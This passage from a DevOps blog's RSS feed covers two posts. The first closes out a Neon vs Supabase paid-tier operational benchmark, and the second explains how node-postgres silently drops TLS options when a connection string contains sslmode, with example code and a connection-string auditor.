<li><strong>Branching held its free-tier shape</strong>: a Neon branch arrives carrying the parent&#39;s 100k rows in 1.7s; a Supabase branch arrives schema-only in 6.2-6.7s. Supabase&#39;s API now has a with_data flag, but every attempt returned 406 &quot;Failed to fetch latest physical backup&quot; on a fresh project: data branches have infrastructure prerequisites.</li>
<li><strong>Under connection stampedes the platforms are twins</strong>: 50, 100, and 200 simultaneous cold connections produced near-identical wave times and zero refusals on both.</li>
</ul>
<h2 id="h2-how-we-measured" class="group relative scroll-mt-24">
        <a href="#h2-how-we-measured" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How we measured
        </a>
        </h2><p>Every number below is the median of repeated runs (10 per operation per session for management operations, 5 waves per concurrency level), collected in two independent sessions on consecutive days. The two sessions agreed within single-digit percentages on every operation, which is the property that makes medians worth publishing. The client sat 1-2ms from both platforms. Resources were created fresh and torn down after every run.</p>
<p>One honest note on plans: the Supabase side ran on Pro ($25/month). The Neon side ran on a Scale-plan account, but every operation measured here (branching, resize, replicas, restore) behaves identically on Launch; plan tier changes quotas and retention windows, not the mechanics we timed.</p>
<h2 id="h2-compute-resize-the-3am-operation" class="group relative scroll-mt-24">
        <a href="#h2-compute-resize-the-3am-operation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Compute resize: the 3am operation
        </a>
        </h2><p>You sized the database for launch traffic. Launch went well. Now you need the next compute size, and the question that matters is not &quot;can the platform do it&quot; but &quot;what happens to my users while it does&quot;.</p>
<p>We resized each platform&#39;s compute up and back down, ten cycles per session, while a probe ran <code>select 1</code> against the database every 250 milliseconds. Two numbers per resize: how long until the management API reported the change applied, and how long SQL actually failed.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Compute resize: API apply time vs actual SQL outage (median)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;10 resize cycles per provider per session, alternating up and down. Outage measured by probing select 1 every 250ms through the change.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Neon, apply&quot;,&quot;value&quot;:2383.9,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Neon, SQL outage&quot;,&quot;value&quot;:0,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, apply&quot;,&quot;value&quot;:39218.3,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Supabase, SQL outage&quot;,&quot;value&quot;:38879.7,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><p>Neon applies an autoscaling-limit change in 2.4 seconds, and across forty resize cycles in two sessions, <strong>the probe never failed once</strong>. The compute reconfigures behind the same endpoint without dropping the connection path. Supabase restarts the database to change compute: 39 seconds of apply time, and effectively all of it is real downtime; their docs say resizes are &quot;usually applied with less than 2 minutes of downtime&quot;, and our measurements land comfortably inside that promise while still being 39 seconds of failed queries per change.</p>
<p>The second finding is subtler and bit us during the benchmark itself: <strong>Supabase refuses back-to-back compute changes</strong>. Issue two resizes in quick succession and the API returns &quot;We are still processing addon changes, please try again in 3 minutes&quot;, and the project reports an unhealthy state between changes. For a production runbook this means a Supabase resize is a planned, serialized event with a maintenance-window mindset. On Neon it is closer to a config tweak.</p>
<p>If your workload&#39;s compute needs change often (and on serverless-adjacent platforms, that is the promise), this section is the comparison.</p>
<h2 id="h2-branching-same-story-sharper-edges" class="group relative scroll-mt-24">
        <a href="#h2-branching-same-story-sharper-edges" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Branching: same story, sharper edges
        </a>
        </h2><p>Part one covered free-tier branching; the paid tiers sharpen it. A Neon branch is a copy-on-write reference to the parent&#39;s storage: it arrives carrying all data. A Supabase branch is a freshly provisioned project that replays schema and config: it arrives empty of data, on Pro as on free.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Branch to queryable: Neon copies 100k rows, Supabase copies schema only&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Session 2 runs shown; session 1 medians within 8%. One session-1 Supabase branch took 146 seconds, see the text.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon (with data)&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;samples&quot;:[1712.7,1746.6,1678.7,1659.5,1704.8,1704.2,1701.4,1705.1,1677.6,1690.8]},{&quot;name&quot;:&quot;Supabase (schema only)&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;samples&quot;:[7213.8,6151.7,10287.8,6207,6842.3,6311.6,5946.2,6147.4,5977.8,5860.3]}]}"></div><p>Medians: 1.7 seconds for a Neon branch with 100,000 rows of parent data, 6.2-6.7 seconds for a Supabase schema-only branch. Both respectable. Two asterisks worth your attention though:</p>
<p><strong>The tail.</strong> In session one, nine Supabase branches took 6-8 seconds and one took <strong>146 seconds</strong>, with nothing different about the request. Session two had no such outlier, which is exactly why we run multiple sessions. If your CI creates a branch per pull request, a 2.5-minute outlier is the kind of thing that makes a developer rerun the pipeline and file a flaky-infra ticket.</p>
<p><strong>The with_data flag.</strong> Supabase&#39;s branch API accepts <code>with_data: true</code>, which on paper would close the data gap. In practice, every attempt on our freshly created projects failed with 406 &quot;Failed to fetch latest physical backup&quot;: data branches require the project to already have physical backups, which fresh projects do not have and which normally arrives with the PITR add-on. For the create-test-destroy loop that makes branching valuable, data-included branches on Supabase have prerequisites that defeat the purpose today.</p>
<h2 id="h2-read-replicas-attach-vs-clone" class="group relative scroll-mt-24">
        <a href="#h2-read-replicas-attach-vs-clone" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Read replicas: attach vs clone
        </a>
        </h2><p>Adding a read replica is where the two architectures stop being abstract diagrams and start being your wait time.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Read replica to first query&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Neon attaches compute to shared storage; Supabase clones the database (Small compute minimum).&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Neon&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;samples&quot;:[8219.8,8171.9,8018.9,8018,8043.2,8047,7984.8,9149.2]},{&quot;name&quot;:&quot;Supabase&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;samples&quot;:[183306.8,181922.1,174655.8,181425.2]}]}"></div><p>Neon: 8 seconds median to a replica answering queries. There is nothing to copy; a read-only compute attaches to the same shared storage as the primary, so replica creation is compute provisioning, full stop. It also means no replication lag in the classic sense and no extra storage bill.</p>
<p>Supabase: 181 seconds median, remarkably consistent (our session-one runs landed within a 2-second band of each other), because each replica is a physical clone of the database with WAL streaming, the way RDS would do it. Two operational prerequisites we hit: the primary must run Small compute or larger (the API rejects replicas on Micro with &quot;Read replicas require a minimum size of small&quot;), and replica disk bills at 1.25x the primary&#39;s size.</p>
<p>Neither approach is wrong. Clones isolate replicas from primary storage performance; shared storage makes replicas instant and cheap. But if your scaling playbook says &quot;add a replica when read latency climbs&quot;, one platform executes that play in seconds and the other in minutes, and the minutes version also costs a compute-size bump if you started small.</p>
<h3 id="h3-does-any-of-this-scale-with-database-size" class="group relative scroll-mt-24">
        <a href="#h3-does-any-of-this-scale-with-database-size" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Does any of this scale with database size?
        </a>
        </h3><p>The attach-vs-clone story makes a testable prediction: copy-on-write operations should stay flat as the database grows, physical clones should not. So we reran branches and replicas at 100k, 1M, and 5M seeded rows, a 50x span.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;line&quot;,&quot;title&quot;:&quot;Read replica creation as the database grows&quot;,&quot;unit&quot;:&quot;s&quot;,&quot;caption&quot;:&quot;Median time to a replica answering queries at 100k, 1M, and 5M seeded rows.&quot;,&quot;x&quot;:[&quot;100k rows&quot;,&quot;1M rows&quot;,&quot;5M rows&quot;],&quot;series&quot;:[{&quot;name&quot;:&quot;Neon&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;data&quot;:[7.9,8,8.2]},{&quot;name&quot;:&quot;Supabase&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;data&quot;:[181,181.8,202.7]}]}"></div><p>The prediction holds, with one nuance. Neon branches are flat to the decimal (1.73s, 1.67s, 1.67s) and so are its replicas (7.9s, 8.0s, 8.2s): there is nothing that copies data, so data size cannot matter. Supabase branches are also flat at 6.4s, but for the less flattering reason that they only copy schema. Supabase replicas are the one operation where size shows: the median grew 12% by 5M rows and p95 stretched from 182s to 234s. At a few hundred megabytes, provisioning still dominates the clone; at real production sizes, the copy takes over and that line keeps climbing. Our benchmark budget stops at 5M rows, but the direction is unambiguous, and it compounds the playbook problem above: the moment you most need a replica is the moment your database is biggest.</p>
<h2 id="h2-the-connection-stampede-a-tie-worth-publishing" class="group relative scroll-mt-24">
        <a href="#h2-the-connection-stampede-a-tie-worth-publishing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The connection stampede: a tie worth publishing
        </a>
        </h2><p>Serverless platforms fail in bursts: two hundred function invocations wake at once and all of them want a connection. We simulated exactly that through each platform&#39;s transaction pooler: N simultaneous cold connections, each performing connect, TLS, auth, one query, disconnect.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Connection stampede: N simultaneous cold connections through the pooler (median wave)&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;5 waves per level per provider. Zero refused connections at any level on either platform.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Neon, 50 clients&quot;,&quot;value&quot;:313,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, 50 clients&quot;,&quot;value&quot;:308,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Neon, 100 clients&quot;,&quot;value&quot;:610,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, 100 clients&quot;,&quot;value&quot;:522,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;Neon, 200 clients&quot;,&quot;value&quot;:1109,&quot;series&quot;:&quot;Neon&quot;},{&quot;label&quot;:&quot;Supabase, 200 clients&quot;,&quot;value&quot;:1058,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><p>Both platforms absorb a 200-connection stampede in about a second, scaling near-linearly from 50 to 200 clients, with <strong>zero refused connections at any level on either platform</strong>. Supabase&#39;s Supavisor was a hair faster at every level; the margin is noise. After the resize and replica sections, it would be easy to expect Neon to win everything; this is the result that says the comparison is about architecture, not quality. Both teams have built excellent poolers.</p>
<h2 id="h2-restore-the-operation-you-hope-never-to-time" class="group relative scroll-mt-24">
        <a href="#h2-restore-the-operation-you-hope-never-to-time" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Restore: the operation you hope never to time
        </a>
        </h2><p>We restored Neon branches to a point 60 seconds in the past, with 100k rows of data, eight runs per session: <strong>5.6 to 6.9 seconds median</strong> until the management API confirmed completion and SQL answered on the restored state. That is point-in-time recovery at interactive speed, and it comes included.</p>
<p>On Supabase, point-in-time recovery is a $100/month add-on (per 7-day retention window, Small compute minimum), so we documented it rather than benchmarked it; daily backups are included on Pro but a daily backup is a very different promise from PITR when the bad migration ran at 14:47. If sub-minute-granularity recovery matters to your operation, price the add-on into the comparison.</p>
<h2 id="h2-the-finding-we-didnt-go-looking-for" class="group relative scroll-mt-24">
        <a href="#h2-the-finding-we-didnt-go-looking-for" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The finding we didn't go looking for
        </a>
        </h2><p>While rechecking our own dashboard we noticed something odd: project creation on the Supabase Pro org was wildly slower than the free-org numbers from part one. So we measured it properly, twice, a day apart.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;dots&quot;,&quot;title&quot;:&quot;Supabase project creation to first query, free org vs Pro org&quot;,&quot;unit&quot;:&quot;s&quot;,&quot;caption&quot;:&quot;Same region, same API, same harness. The only variable is the organization's plan.&quot;,&quot;series&quot;:[{&quot;name&quot;:&quot;Free org&quot;,&quot;color&quot;:&quot;#34d399&quot;,&quot;samples&quot;:[7.6,11.9,7.1,6.5,8.5,7.4,6.9,8.1,9.2,9.9,6.8,6.9,7.5,7.9,6.8,6.9,7.1,7.3,11.8,8.4]},{&quot;name&quot;:&quot;Pro org, day one&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;samples&quot;:[148.4,140.9,152.1,137.9,112.9,112,113.4,114.8,153.5,169.9,158,110.5,145.8,110.3,109.8,125.2,163.5,107.3,152.1,107.6]},{&quot;name&quot;:&quot;Pro org, day two&quot;,&quot;color&quot;:&quot;#818cf8&quot;,&quot;samples&quot;:[137.7,110.3,110.9,108.5,134.2,142.4,111.9,113.8]}]}"></div><p>Free org: <strong>7.4 seconds median</strong> to a queryable project. Pro org: <strong>125.2 seconds</strong> on day one (20 runs) and <strong>111.9 seconds</strong> on day two (10 runs), so this is not a one-day capacity blip. Day two also produced two provisioning failures we did not cause: one project came up with no pooler configuration, and another returned 404 on its own ref immediately after creation. Neon, measured the same morning as a control, created projects in 5.5 seconds with no failures.</p>
<p>We do not know why paid-org provisioning is 15x slower than free; nothing in the documentation suggests it should be. If your platform automation creates Supabase projects programmatically (per-tenant databases, ephemeral environments), budget two minutes and a retry loop, not eight seconds. We have raw samples committed for all three sessions and would genuinely welcome an explanation.</p>
<h2 id="h2-what-failed-and-what-it-taught-us" class="group relative scroll-mt-24">
        <a href="#h2-what-failed-and-what-it-taught-us" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What failed, and what it taught us
        </a>
        </h2><p>A benchmark that reports only clean numbers is hiding something. Ours hit three walls worth knowing about:</p>
<ul>
<li>Supabase&#39;s addon pipeline throttling (above) means resize benchmarks, and resize automation, must wait minutes between changes.</li>
<li>Supabase Management API mutations sometimes return empty response bodies, and replica setup reports no status; readiness means polling the pooler config until a READ_REPLICA entry appears. Automation against these APIs needs more defensive plumbing than Neon&#39;s operations API, which returns explicit operation objects with terminal states.</li>
<li>A long-running idle Postgres connection on either platform will emit asynchronous errors when the server restarts under it (compute resize, for instance). If your Node service holds connections through a Supabase resize, handle the <code>error</code> event on your clients or the restart will take your process down with it. Ask us how we know.</li>
<li>One more finding was waiting after the benchmarks ended. With every benchmark project torn down and the organization verifiably empty (<code>GET /v1/projects</code> and the org-scoped listing both return zero projects), downgrading the org from Pro was refused with &quot;You still have active preview branches. Please delete all your preview branches and disable branching feature before downgrading to Free Plan.&quot; No projects exist, so no branches can: the downgrade validator appears to count orphaned branch records left behind when branches&#39; parent projects are deleted. If you run branch-heavy ephemeral workloads on a paid org and ever plan to downgrade it, know that the exit door can be blocked by data you can no longer see or delete. Supabase support sorted it out: their team confirmed five orphaned branch projects stuck in a restoring state, each returning 403 to both reads and deletes through the public API, so only their infra team could remove them. Once they did, the downgrade went straight through. The root cause matched our guess (a branch still provisioning when its parent project was deleted), support was responsive throughout, and they said they are hardening the flow so it cannot happen again. Worth knowing this is an edge case you only reach by creating and destroying branches fast in automation, not something a normal project hits.</li>
</ul>
<h2 id="h2-verdict" class="group relative scroll-mt-24">
        <a href="#h2-verdict" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Verdict
        </a>
        </h2><p>The free-tier conclusion was &quot;pick on shape, not speed&quot;. The production-tier conclusion is sharper: <strong>the operational gap is real, and it favors Neon almost everywhere it exists</strong>. Resize without downtime vs a 39-second outage with a minutes-long cooldown; replicas in 8 seconds vs 3 minutes with compute prerequisites; branches with data vs without; included interactive PITR vs a $100/month add-on. The one place the platforms tie (connection stampedes) is the one place most teams assumed serverless Postgres would struggle, and neither does.</p>
<p>What this verdict does not say: Supabase Pro still bundles auth, storage, realtime, and edge functions that Neon does not have today (announced, not shipped), and part one&#39;s conclusion stands: teams shipping a v1 product buy real velocity with that bundle. But if the database is the load-bearing component of your operation and you expect to resize, replicate, branch, and occasionally restore it, the operational benchmarks have a clear winner.</p>
<p>Every number above links to raw committed samples, the <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> updates with every benchmark session, and the <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">harness is open source</a>: if you see something off in the methodology or get different numbers, open an issue or a pull request, corrections are welcome and credited. For the architectural side by side rather than the timings, our <a href="https://devops-daily.com/comparisons/neon-vs-supabase">full Neon vs Supabase comparison</a> covers pricing models, PITR, and the bundled features in one place. Part three prices all of this against a growing application, including the cost crossover points nobody talks about.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[node-postgres Silently Ignores Your TLS Config When the URL Says sslmode]]></title>
      <link>https://devops-daily.com/posts/node-postgres-sslmode-silently-ignores-ssl-options</link>
      <description><![CDATA[If your connection string contains sslmode=require, the pg library throws away the ssl options object where you loaded your CA certificate, and verification fails with "self-signed certificate in certificate chain". Here is the trap, the fix, and the v9 changes coming.]]></description>
      <pubDate>Wed, 10 Jun 2026 20:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/node-postgres-sslmode-silently-ignores-ssl-options</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[nodejs]]></category><category><![CDATA[tls]]></category><category><![CDATA[supabase]]></category><category><![CDATA[debugging]]></category><category><![CDATA[databases]]></category>
      <content:encoded><![CDATA[<p>While building a <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">benchmark harness for Neon and Supabase</a>, we lost an hour to a TLS failure that made no sense. The CA certificate was correct. The chain verified fine with <code>openssl</code>. A raw Node <code>tls.connect</code> with the same CA returned <code>authorized: true</code>. And node-postgres still failed every connection with:</p>
<pre><code>Error: self-signed certificate in certificate chain
</code></pre><p>The cause turned out to be a behavior of <code>pg</code> (node-postgres) that is easy to hit and hard to suspect: <strong>when your connection string contains an <code>sslmode</code> parameter, the <code>ssl</code> options object you pass to the client is silently ignored.</strong> Your carefully loaded CA file never reaches the TLS socket.</p>
<h2 id="h2-the-trap-reproduced" class="group relative scroll-mt-24">
        <a href="#h2-the-trap-reproduced" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The trap, reproduced
        </a>
        </h2><p>This is the code almost everyone writes when a provider&#39;s certs chain to a private CA (Supabase, DigitalOcean managed Postgres, Crunchy Bridge, most internal platforms):</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> pg <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { readFileSync } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:fs&#x27;</span>;

<span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> pg.<span class="hljs-title class_">Client</span>({
  <span class="hljs-attr">connectionString</span>: <span class="hljs-string">&#x27;postgresql://user:pass@db.example.com:5432/postgres?sslmode=require&#x27;</span>,
  <span class="hljs-attr">ssl</span>: {
    <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>, <span class="hljs-string">&#x27;utf8&#x27;</span>),
  },
});

<span class="hljs-keyword">await</span> client.<span class="hljs-title function_">connect</span>();
<span class="hljs-comment">// =&gt; Error: self-signed certificate in certificate chain</span>
</code></pre><p>It reads like &quot;require TLS, and here is the CA to verify against&quot;. What actually happens: <code>pg-connection-string</code> parses <code>sslmode=require</code> from the URL into its own ssl configuration, and that parsed value takes precedence over the <code>ssl</code> object you passed. Your <code>ca</code> is gone. The connection attempts full verification against the system trust store, the private CA is not in it, and you get the self-signed error even though you are holding the right certificate in your hand.</p>
<p>The same code with the parameter removed from the URL works immediately:</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> pg.<span class="hljs-title class_">Client</span>({
  <span class="hljs-comment">// no sslmode in the URL</span>
  <span class="hljs-attr">connectionString</span>: <span class="hljs-string">&#x27;postgresql://user:pass@db.example.com:5432/postgres&#x27;</span>,
  <span class="hljs-attr">ssl</span>: {
    <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>, <span class="hljs-string">&#x27;utf8&#x27;</span>),
  },
});

<span class="hljs-keyword">await</span> client.<span class="hljs-title function_">connect</span>(); <span class="hljs-comment">// verified against your CA, connects fine</span>
</code></pre><p>Nothing about the error message points at the URL. That is what makes this trap expensive: every debugging instinct says &quot;wrong CA file&quot; or &quot;incomplete chain&quot;, and both are red herrings you can burn an hour on, like we did.</p>
<h2 id="h2-the-rule-to-remember" class="group relative scroll-mt-24">
        <a href="#h2-the-rule-to-remember" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The rule to remember
        </a>
        </h2><p><strong>Configure TLS in exactly one place.</strong> With node-postgres, that place should be the <code>ssl</code> option:</p>
<ul>
<li>Strip <code>sslmode</code> (and <code>sslcert</code>, <code>sslkey</code>, <code>sslrootcert</code>) out of connection strings your code receives, or never put them there.</li>
<li>Put everything TLS-related in the <code>ssl</code> object: <code>ca</code> for private CAs, plus client certs if you use them.</li>
<li>An <code>ssl</code> object with a <code>ca</code> implies verification. Never &quot;fix&quot; this error with <code>rejectUnauthorized: false</code>; that disables verification entirely and turns your database connection into a man-in-the-middle exercise.</li>
</ul>
<p>If the connection string comes from an environment variable you do not control, sanitize it:</p>
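<pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> pg <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { readFileSync } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:fs&#x27;</span>;

<span class="hljs-keyword">const</span> url = <span class="hljs-keyword">new</span> <span class="hljs-title function_">URL</span>(process.<span class="hljs-property">env</span>.<span class="hljs-property">DATABASE_URL</span>);
<span class="hljs-comment">// Strip every TLS parameter so the ssl object below is the only TLS config</span>
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> name <span class="hljs-keyword">of</span> [<span class="hljs-string">&#x27;sslmode&#x27;</span>, <span class="hljs-string">&#x27;sslcert&#x27;</span>, <span class="hljs-string">&#x27;sslkey&#x27;</span>, <span class="hljs-string">&#x27;sslrootcert&#x27;</span>]) {
  url.<span class="hljs-property">searchParams</span>.<span class="hljs-title function_">delete</span>(name);
}

<span class="hljs-keyword">const</span> client = <span class="hljs-keyword">new</span> pg.<span class="hljs-title class_">Client</span>({
  <span class="hljs-attr">connectionString</span>: url.<span class="hljs-title function_">toString</span>(),
  <span class="hljs-attr">ssl</span>: { <span class="hljs-attr">ca</span>: <span class="hljs-title function_">readFileSync</span>(<span class="hljs-string">&#x27;./provider-ca.crt&#x27;</span>, <span class="hljs-string">&#x27;utf8&#x27;</span>) },
});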
</code></pre><h2 id="h2-it-gets-stranger-sslmode-does-not-mean-what-libpq-taught-you" class="group relative scroll-mt-24">
        <a href="#h2-it-gets-stranger-sslmode-does-not-mean-what-libpq-taught-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          It gets stranger: sslmode does not mean what libpq taught you
        </a>
        </h2><p>If you watched your Node process closely while reproducing this, you saw a warning that documents a second surprise:</p>
<pre><code>Warning: SECURITY WARNING: The SSL modes &#x27;prefer&#x27;, &#x27;require&#x27;, and &#x27;verify-ca&#x27;
are treated as aliases for &#x27;verify-full&#x27;.
In the next major version (pg-connection-string v3.0.0 and pg v9.0.0), these
modes will adopt standard libpq semantics, which have weaker security guarantees.
</code></pre><p>In libpq (the C library that psql and most languages&#39; drivers wrap), <code>sslmode=require</code> means &quot;encrypt, but do not verify the certificate&quot;. In current node-postgres, <code>require</code> is treated as <code>verify-full</code>: encrypt AND verify hostname AND chain. Stricter than what the same string means everywhere else, which is exactly why the failure above happens with providers on private CAs: psql connects happily with <code>sslmode=require</code> while your Node service refuses.</p>
<p>Two practical consequences:</p>
<ul>
<li>A connection string copied from provider docs (written with libpq semantics in mind) can work in psql and fail in Node with the same <code>sslmode=require</code>.</li>
<li>When pg v9 lands, the same string changes meaning again, to the weaker libpq behavior. If you rely on <code>sslmode=require</code> giving you verification today, that silently stops being true on upgrade. One more reason to own TLS in the <code>ssl</code> object and keep the URL clean. If you need the libpq behavior now, pg already supports <code>uselibpqcompat=true&amp;sslmode=require</code>.</li>
</ul>
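<p>Both consequences can be checked mechanically before a deploy. The auditor below is an added example, not code from pg or from our harness: it models the rules described in this section (the mode tables, the finding names, and the treatment of <code>disable</code> are this example's assumptions) and reports what a connection string means today and after the pg v9 change.</p>

```javascript
// Added example: models the sslmode rules described in this section.
// It never calls pg; the tables below are the model's assumptions.

// Certificate checking each mode implies under standard libpq semantics.
// Not modelled: libpq's "require" acts like "verify-ca" when a root CA file exists.
const LIBPQ = {
  disable: 'no-tls',
  allow: 'none',
  prefer: 'none',
  require: 'none',
  'verify-ca': 'chain',
  'verify-full': 'chain+hostname',
};

// Current node-postgres, per the warning quoted above: prefer, require and
// verify-ca are aliases for verify-full. "disable" meaning no TLS is assumed.
const PG_TODAY = {
  disable: 'no-tls',
  prefer: 'chain+hostname',
  require: 'chain+hostname',
  'verify-ca': 'chain+hostname',
  'verify-full': 'chain+hostname',
};

const STRENGTH = { 'no-tls': 0, none: 1, chain: 2, 'chain+hostname': 3 };

function auditPgUrl(connectionString) {
  const params = new URL(connectionString).searchParams;
  const sslmode = params.get('sslmode');
  const compat = params.get('uselibpqcompat') === 'true';
  const report = { sslmode, compat, today: 'ssl-object', afterV9: 'ssl-object', findings: [] };

  // No sslmode in the URL: TLS is decided by the ssl options object alone.
  if (sslmode === null) return report;

  // Any sslmode in the URL takes precedence over the ssl options object.
  report.findings.push('sslmode-in-url-overrides-ssl-object');

  // uselibpqcompat=true opts into libpq semantics now; v9 makes them the default.
  const todayTable = compat ? LIBPQ : PG_TODAY;
  report.today = todayTable[sslmode] ?? 'unknown';
  report.afterV9 = LIBPQ[sslmode] ?? 'unknown';

  if (report.today === 'unknown' || report.afterV9 === 'unknown') {
    report.findings.push('mode-not-modelled');
    return report;
  }
  if (STRENGTH[report.today] > STRENGTH[report.afterV9]) {
    report.findings.push('weakens-on-pg-v9-upgrade');
  }
  if (report.today === 'none' || report.today === 'no-tls') {
    report.findings.push('server-certificate-not-verified-today');
  }
  return report;
}

// Constructed sample URLs; hosts and credentials are placeholders.
const SAMPLE_URLS = [
  'postgres://app:placeholder@db.example.test:5432/app?sslmode=require',
  'postgres://app:placeholder@db.example.test:5432/app?uselibpqcompat=true&sslmode=require',
  'postgres://app:placeholder@db.example.test:5432/app?sslmode=verify-full',
  'postgres://app:placeholder@db.example.test:5432/app',
];

for (const url of SAMPLE_URLS) {
  const r = auditPgUrl(url);
  // Print only non-secret fields, never the full URL with its password.
  console.log(r.sslmode ?? '(no sslmode)', 'compat=' + r.compat, r.today, '->', r.afterV9, r.findings);
}
```

<p>Run it over every connection string in your environment files and CI secrets; a clean result is an empty findings list, meaning TLS is owned by the <code>ssl</code> object.</p>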
<h2 id="h2-the-supabase-specifics-since-that-is-where-most-people-hit-this" class="group relative scroll-mt-24">
        <a href="#h2-the-supabase-specifics-since-that-is-where-most-people-hit-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The Supabase specifics, since that is where most people hit this
        </a>
        </h2><p>Three details that compound the confusion when the provider is Supabase:</p>
<p><strong>Their certs chain to a private CA.</strong> Database connections present certificates signed by &quot;Supabase Root 2021 CA&quot;, not a public authority. Download the root from the dashboard (Database settings, SSL) and pass it via <code>ssl.ca</code>. With the URL trap above, this is the step that looks broken even when you did it right.</p>
<p><strong>Free-plan direct hosts are IPv6-only.</strong> <code>db.&lt;ref&gt;.supabase.co</code> has no A record. If your client runs on an IPv4-only network (most CI runners, many VPSes, lots of home ISPs), direct connections cannot work at all and you must use their Supavisor pooler instead: session mode on port 5432, transaction mode on 6543. The pooler presents the same private-CA chain, so the <code>ssl.ca</code> requirement follows you there.</p>
<p><strong>The pooler hostname varies per project.</strong> Our first benchmark project landed on <code>aws-1-eu-central-1.pooler.supabase.com</code> while most docs and tutorials show <code>aws-0-...</code>. Both clusters exist. Read your project&#39;s actual connection details from the dashboard or the Management API rather than pattern-matching a tutorial.</p>
<p>None of this is unique to Supabase; any provider with a private CA plus a pooler can serve the same combination. Supabase just happens to be where a lot of Node developers meet all three at once.</p>
<h2 id="h2-a-five-line-sanity-test-that-would-have-saved-us-an-hour" class="group relative scroll-mt-24">
        <a href="#h2-a-five-line-sanity-test-that-would-have-saved-us-an-hour" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          A five-line sanity test that would have saved us an hour
        </a>
        </h2><p>When TLS fails and you suspect the CA, test the chain without pg in the way:</p>
<pre><code class="hljs language-javascript"><span class="hljs-keyword">import</span> tls <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:tls&#x27;</span>;
<span class="hljs-keyword">import</span> net <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:net&#x27;</span>;
<span class="hljs-keyword">import</span> { readFileSync } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;node:fs&#x27;</span>;

